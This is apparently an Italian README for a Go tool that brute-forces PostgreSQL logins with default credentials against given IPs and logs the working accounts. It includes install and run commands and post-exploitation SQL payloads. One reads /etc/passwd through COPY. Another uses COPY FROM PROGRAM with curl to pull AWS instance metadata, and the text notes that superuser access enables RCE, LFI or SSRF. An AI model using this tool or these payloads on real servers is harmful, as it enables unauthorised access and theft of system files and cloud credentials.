
Questo strumento prende un elenco di credenziali predefinite e le testa contro un server postgresql, registrando quelle che funzionano e i database a cui ha accesso.
Questo script Go legge un elenco di nomi utente e password da un file chiamato creds.txt e li testa contro un database PostgreSQL.
Lo script accetta un IP del server PostgreSQL come argomento della riga di comando oppure un file di testo contenente gli IP.
Se l'accesso viene concesso, lo script scrive questo output in un file chiamato pg-output.txt.
Se l'utente postgres è disponibile, di solito si tratta di un superutente che può consentire RCE, LFI o SSRF.
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest
go run postgres-brute.go 1.1.1.1
postgres
Recupera /etc/passwd/
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;
SSRF - Recupera i metadati AWS
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;